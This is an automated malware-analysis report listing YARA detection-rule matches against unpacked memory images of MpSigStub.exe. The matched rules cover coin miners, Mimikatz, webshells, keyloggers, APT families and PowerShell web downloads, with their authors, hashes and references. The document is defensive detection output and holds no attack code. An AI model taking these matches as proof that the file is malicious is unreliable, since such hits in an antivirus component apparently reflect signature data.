Source: 35.3.MpSigStub.exe.28bd6625a01.91.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_PDB_Path_Keywords date = 2019-10-04, author = Florian Roth, description = Detects suspicious PDB paths, reference = https://twitter.com/stvemillertime/status/1179832666285326337?s=20
Source: 35.3.MpSigStub.exe.28bd7ecabce.191.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.28bd80ae56a.188.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 35.3.MpSigStub.exe.28bd80ae56a.188.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 35.3.MpSigStub.exe.28bd80ae56a.188.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 35.3.MpSigStub.exe.28bd69007f6.71.raw.unpack, type: UNPACKEDPE	Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.28bd7ecabce.89.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.28bd772c9ca.108.raw.unpack, type: UNPACKEDPE	Matched rule: Trojan_Win32_PlaKeylog_B author = Microsoft, description = Keylogger component, activity_group = Platinum, version = 1.0, unpacked_sample_sha1 = 6a1412daaa9bdc553689537df0a004d44f8a45fd, last_modified = 2016-04-12, original_sample_sha1 = 0096a3e0c97b85ca75164f48230ae530c94a2b77
Source: 35.3.MpSigStub.exe.28bd772c9ca.108.raw.unpack, type: UNPACKEDPE	Matched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 35.3.MpSigStub.exe.28bd772c9ca.108.raw.unpack, type: UNPACKEDPE	Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 35.3.MpSigStub.exe.28bd772c9ca.108.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 35.3.MpSigStub.exe.28bd772c9ca.108.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT41_POISONPLUG date = 2019-08-07, hash4 = 3e6c4e97cc09d0432fbbbf3f3e424d4aa967d3073b6002305cd6573c47f0341f, hash3 = f4d57acde4bc546a10cd199c70cdad09f576fdfe66a36b08a00c19ff6ae19661, hash2 = 5d971ed3947597fbb7e51d806647b37d64d9fe915b35c7c9eaf79a37b82dab90, author = Florian Roth, description = Detects APT41 malware POISONPLUG, reference = https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html, score = 2eea29d83f485897e2bac9501ef000cc266ffe10019d8c529555a3435ac4aabd
Source: 35.3.MpSigStub.exe.28bd772c9ca.108.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 35.3.MpSigStub.exe.28bd8041112.117.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.28bd8041112.117.raw.unpack, type: UNPACKEDPE	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 35.3.MpSigStub.exe.28bd8041112.117.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.28bd8041112.117.raw.unpack, type: UNPACKEDPE	Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 35.3.MpSigStub.exe.28bd718fe9d.113.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.28bd718fe9d.113.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.28bd718fe9d.155.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.28bd718fe9d.155.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.28bd77beebe.25.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XMRIG_String date = 2018-12-28, hash1 = eb18ae69f1511eeb4ed9d4d7bcdf3391a06768f384e94427f4fc3bd21b383127, author = Florian Roth, description = Detects a suspicious XMRIG crypto miner executable string in filr, reference = Internal Research
Source: 35.3.MpSigStub.exe.28bd7a92f79.137.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 35.3.MpSigStub.exe.28bd7a92f79.137.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.28bd700b2de.97.raw.unpack, type: UNPACKEDPE	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 35.3.MpSigStub.exe.28bd6ea607c.235.raw.unpack, type: UNPACKEDPE	Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.28bd6ea607c.235.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.28bd7098dc6.64.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.28bd64bea82.66.raw.unpack, type: UNPACKEDPE	Matched rule: Unspecified_Malware_Sep1_A1 date = 2017-09-12, hash1 = 28143c7638f22342bff8edcd0bedd708e265948a5fcca750c302e2dca95ed9f0, author = Florian Roth, description = Detects malware from DrqgonFly APT report, reference = https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.28bd7ec89ca.192.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.28bd66afd72.161.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 35.3.MpSigStub.exe.28bd7361111.94.raw.unpack, type: UNPACKEDPE	Matched rule: HackTool_Samples description = Hacktool, score =
Source: 35.3.MpSigStub.exe.28bd66ae56a.160.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 35.3.MpSigStub.exe.28bd78ce0e6.60.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 35.3.MpSigStub.exe.28bd7098dc6.214.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.28bd640a126.19.raw.unpack, type: UNPACKEDPE	Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.28bd640a126.19.raw.unpack, type: UNPACKEDPE	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 35.3.MpSigStub.exe.28bd718d495.127.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.28bd718d495.127.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.28bd718e899.115.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.28bd718e899.115.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.28bd8042916.116.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.28bd8042916.116.raw.unpack, type: UNPACKEDPE	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 35.3.MpSigStub.exe.28bd8042916.116.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.28bd8042916.116.raw.unpack, type: UNPACKEDPE	Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 35.3.MpSigStub.exe.28bd6f34515.103.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 35.3.MpSigStub.exe.28bd6f34515.103.raw.unpack, type: UNPACKEDPE	Matched rule: HackTool_MSIL_SharPersist_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 98ecf58d48a3eae43899b45cec0fc6b7
Source: 35.3.MpSigStub.exe.28bd640b52a.18.raw.unpack, type: UNPACKEDPE	Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.28bd640b52a.18.raw.unpack, type: UNPACKEDPE	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 35.3.MpSigStub.exe.28bd718e899.128.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.28bd718e899.128.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.28bd718d495.154.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.28bd718d495.154.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.28bd7b2bc01.138.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.28bd80af96e.189.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 35.3.MpSigStub.exe.28bd80af96e.189.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 35.3.MpSigStub.exe.28bd80af96e.189.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 35.3.MpSigStub.exe.28bd80af96e.118.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 35.3.MpSigStub.exe.28bd80af96e.118.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 35.3.MpSigStub.exe.28bd80af96e.118.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 35.3.MpSigStub.exe.28bd80b0d72.190.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 35.3.MpSigStub.exe.28bd80b0d72.190.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 35.3.MpSigStub.exe.28bd80b0d72.190.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 35.3.MpSigStub.exe.28bd772d1ce.107.raw.unpack, type: UNPACKEDPE	Matched rule: Trojan_Win32_PlaKeylog_B author = Microsoft, description = Keylogger component, activity_group = Platinum, version = 1.0, unpacked_sample_sha1 = 6a1412daaa9bdc553689537df0a004d44f8a45fd, last_modified = 2016-04-12, original_sample_sha1 = 0096a3e0c97b85ca75164f48230ae530c94a2b77
Source: 35.3.MpSigStub.exe.28bd772d1ce.107.raw.unpack, type: UNPACKEDPE	Matched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 35.3.MpSigStub.exe.28bd772d1ce.107.raw.unpack, type: UNPACKEDPE	Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 35.3.MpSigStub.exe.28bd772d1ce.107.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 35.3.MpSigStub.exe.28bd772d1ce.107.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT41_POISONPLUG date = 2019-08-07, hash4 = 3e6c4e97cc09d0432fbbbf3f3e424d4aa967d3073b6002305cd6573c47f0341f, hash3 = f4d57acde4bc546a10cd199c70cdad09f576fdfe66a36b08a00c19ff6ae19661, hash2 = 5d971ed3947597fbb7e51d806647b37d64d9fe915b35c7c9eaf79a37b82dab90, author = Florian Roth, description = Detects APT41 malware POISONPLUG, reference = https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html, score = 2eea29d83f485897e2bac9501ef000cc266ffe10019d8c529555a3435ac4aabd
Source: 35.3.MpSigStub.exe.28bd772d1ce.107.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 35.3.MpSigStub.exe.28bd63ab4aa.184.raw.unpack, type: UNPACKEDPE	Matched rule: XOR_4byte_Key date = 2015-12-15, author = Florian Roth, description = Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan), reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.28bd7098dc6.214.unpack, type: UNPACKEDPE	Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 35.3.MpSigStub.exe.28bd7098dc6.214.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.28bd7098dc6.214.unpack, type: UNPACKEDPE	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 35.3.MpSigStub.exe.28bd63accb2.185.raw.unpack, type: UNPACKEDPE	Matched rule: XOR_4byte_Key date = 2015-12-15, author = Florian Roth, description = Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan), reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.28bd718fe9d.129.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.28bd718fe9d.129.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.28bd7361a65.95.raw.unpack, type: UNPACKEDPE	Matched rule: HackTool_Samples description = Hacktool, score =
Source: 35.3.MpSigStub.exe.28bd6afc36e.65.unpack, type: UNPACKEDPE	Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 35.3.MpSigStub.exe.28bd6697177.158.unpack, type: UNPACKEDPE	Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 35.3.MpSigStub.exe.28bd6697177.158.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_DShell_3 author = FireEye, description = This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = cf752e9cd2eccbda5b8e4c29ab5554b6
Source: 35.3.MpSigStub.exe.28bd6697177.158.unpack, type: UNPACKEDPE	Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 35.3.MpSigStub.exe.28bd7098dc6.98.unpack, type: UNPACKEDPE	Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
